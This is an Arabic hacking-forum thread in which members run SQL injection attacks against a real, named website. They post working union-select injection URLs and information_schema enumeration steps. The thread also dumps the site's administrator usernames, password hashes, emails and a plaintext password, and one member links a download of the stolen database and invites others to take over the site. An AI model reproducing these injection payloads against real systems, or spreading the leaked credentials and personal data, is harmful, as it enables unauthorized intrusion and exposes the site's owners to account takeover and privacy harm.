موقع مصاب - اصدار قاعدة البيانات 5

dz-fox · 18 يوليو 2010

[align=center]السلام عليكم

الموقع مجرب و الثغرة ناجحة 100/100 و أنا لم أرد وضع اليوزر و الباسوورد حتى يتدرب عليه المبتدئين

[hide]http://www.bible-history.com/subcat.php?id=-23%20union%20select%20version%28%29[/hide]

بالتوفيق[/align]

superco0ol · 18 يوليو 2010

جاء في وقته

حلو بتعلم عليه

تسلم ايدك..

سربوتن · 18 يوليو 2010

[align=center]الله يبارك فيك [/align]

dz-fox · 18 يوليو 2010

[align=center]شكرا على المرور شباب

ان شاء الله ستكون هناك مواقع جديدة[/align]

Master vbspiders · 18 يوليو 2010

[align=center][/align]بارك الله فيك في ميزان حسناتك باذن الله
تحياتي

Azar36.exe · 18 يوليو 2010

mezyana khoua

Azar36.exe · 18 يوليو 2010

تفضلو يا إخواني :666:

PHP:

http://www.bible-history.com/subcat.php?id=-23+union+select+concat(user_name,0x3e,user_pass,0x3e,user_email)+from+bho_board_users--

Master vbspiders · 18 يوليو 2010

Azar36.exe قال:
تفضلو يا إخواني :666:

PHP:

http://www.bible-history.com/subcat.php?id=-23+union+select+concat(user_name,0x3e,user_pass,0x3e,user_email)+from+bho_board_users--

[align=center][/align]حبيبي مشكور بارك الله فيك لكن انا الان جربت حقن الموقع من جديد وطلع معاي معلومات غير شكل

طلع اليوزر : jc
وطلع الباسورد : mos3s

[align=center][/align]انا لو معاي لوحة التحكم كنت جربت ادخل فيه حتى اتاكد اي واحد الصح بس للاسف ما لقيتها..
الي يلقي لوحة التحكم يدخل ويجرب وحلال عليه الموقع ^_^
تحياتي

Azar36.exe · 18 يوليو 2010

أضف الأمر ID لتعرف أيهما الأول

Azar36.exe · 18 يوليو 2010

هذا اليوز الذي إكتشفته يحمل رقم 3 لاكن ماذام الموقع ليس مفتوح التسجيل إذن كلهم من الإذارة

PHP:

http://www.bible-history.com/subcat.php?id=-23+union+select+concat(user_id,0x3e,user_name,0x3e,user_pass,0x3e,user_email)+from+bho_board_users--

Master vbspiders · 18 يوليو 2010

[align=center][/align]

الان سحبت قاعدة البانات كلها ^_^

وكلامك صحيح ما في اي اعضاء فقط ادارة وهما ثلاثة وعلى الترتيب هيك :
1-admin
2-jc
3-rusty

والباس لكل واحد على الترتيب :

1-a1fba67e72b37d0ba83c2cc937172ec8eb1fda6d
2-b404bbb52c91fe1f291ba9c2719aa7d916dc55e5
3-3a5fbfe524ec4319455769d5462eb2c4ac4cbe79

راح احاول افك التشفير باذن الله...

ايميلاتهم كمان على الترتيب :
1-jim@bible-history.com
2-jim@wanned.com
3-rusty@bible-history.com

عملت سيف لقاعدة البيانات ورفعتها...حملوها وحصلو رابط لوحة التحكم وحلال عليكم الموقع ^_^

لتحميل القاعدة من هنا :
http://www.multiupload.com/QK98XDX9WT

dz-fox · 18 يوليو 2010

[align=center]Master vbspiders
-------------------

بارك الله فيك عزيزي[/align]

darkman.dz · 18 يوليو 2010

جاري التجربة يا ولد البلاد

darkman.dz · 18 يوليو 2010

يا وليد بلادي قولي وعلاه الأمر +from+information_schema+columns
مايمشيش في الموقع ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
و أنا جربت نزع علامة الزائد و كذلك نفس الخال
http://www.bible-history.com/subcat.php?id=-23 union select version()+from+information_schema+columns

dz-fox · 18 يوليو 2010

[align=center]

ooooo_darkman_ooooo قال:
يا وليد بلادي قولي وعلاه الأمر +from+information_schema+columns
مايمشيش في الموقع ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
و أنا جربت نزع علامة الزائد و كذلك نفس الخال
http://www.bible-history.com/subcat.php?id=-23 union select version()+from+information_schema+columns

أهلا أخي ... أنظر

ذلك الأمر لا يوضع لوحده

اليك الخطوات ... أفترض أنك تعرف استخراج الاصدار

بعدها ستضيع هذا الأمر في الأخير

from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)

و تضع الأمر التالي في مكان أحد الأعمدة المصابة

concat(table_name,0x3a,column_name,0x3a,table_schema)

فيصبح الرابط للموقع الذي وضعته أنا كالتالي

http://www.bible-history.com/subcat...e+column_name+LIKE+CHAR(37, 112, 97, 115, 37)

سيظهرلك هذا السطر

bho_board_users:user_newpassword:bible_history

و أظن أنك تعرف كيف تكمل

على العموم ان واجهتك مشكلة ضعها هنا[/align]

darkman.dz · 19 يوليو 2010

dz-fox قال:
[align=center]

أهلا أخي ... أنظر

ذلك الأمر لا يوضع لوحده

اليك الخطوات ... أفترض أنك تعرف استخراج الاصدار

بعدها ستضيع هذا الأمر في الأخير

from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)

و تضع الأمر التالي في مكان أحد الأعمدة المصابة

concat(table_name,0x3a,column_name,0x3a,table_schema)

فيصبح الرابط للموقع الذي وضعته أنا كالتالي

http://www.bible-history.com/subcat...e+column_name+LIKE+CHAR(37, 112, 97, 115, 37)

سيظهرلك هذا السطر

bho_board_users:user_newpassword:bible_history

و أظن أنك تعرف كيف تكمل

على العموم ان واجهتك مشكلة ضعها هنا[/align]

ههههههههههههههههههههههههههههههههههههههههه
شوف أخي الموقع إشتغل عادي اليوم
http://www.bible-history.com/subcat.php?id=-23%20union%20select%20version%28%29+from+information_schema.columns--

لا أعلم لماذا لم يشتغل البارحة
أنت لم تفهم قصدي
أنا قصدت أنه عند إضافة الإستعلام
+from+informaion_schema.columns
لازم يشتغل الموقع عادي من دون أخطاء
حتى نعرف أنو الموقع ليس عامل حظر لهذا الإستعلام
حتى نستطيع إكمال الحقن
smilies15

darkman.dz · 19 يوليو 2010

ههههههههههههههههههههههههههههههههههههههههههههههههههههه
أنا جبت اليوزر و الباس عادي
من دون تشفير
ههههههههههههههههههههههههههههههههههههههههههههههههه
و الحقنة هاهي

http://www.bible-history.com/subcat...me,0x3a,admin_password)+from+administrators--

user = jc
pass = Mos3s

أرجو أن يستفيد الأعضاء الكرام + شكر خاص لك يا ولد بلادي dz-fox

d4rK-h4ck3r · 19 يوليو 2010

darkman.dz · 19 يوليو 2010

هل من أحد خمن لوحة التحكم لنجرب الباس و اليوزر .......

Prince-Of-Hacker · 20 يوليو 2010

مشكووور حبيببي الله يسلم ايدك

السلام عليكم الموقع مجرب و الثغرة ناجحة 100/100 و أنا لم أرد وضع اليوزر و الباسوورد حتى يتدرب عليه المبتدئين...

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

:: Interactive Developer ::